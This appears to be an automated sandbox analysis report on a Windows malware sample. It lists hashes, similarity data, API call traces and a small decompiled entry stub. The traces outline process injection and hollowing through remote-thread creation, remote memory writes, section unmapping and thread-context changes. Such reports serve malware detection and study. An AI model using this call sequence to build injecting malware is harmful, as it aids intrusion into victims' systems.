  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:1C84D323D09233F71A6087CD5DA1F24A
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:57776
Initial sample SHA 256:C79DB04ECADE3813D98209E48A94A8291475B3320E2966206E5E4CE416CD1D6E
Initial sample name:itera.exe

Similar Executed Functions

Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
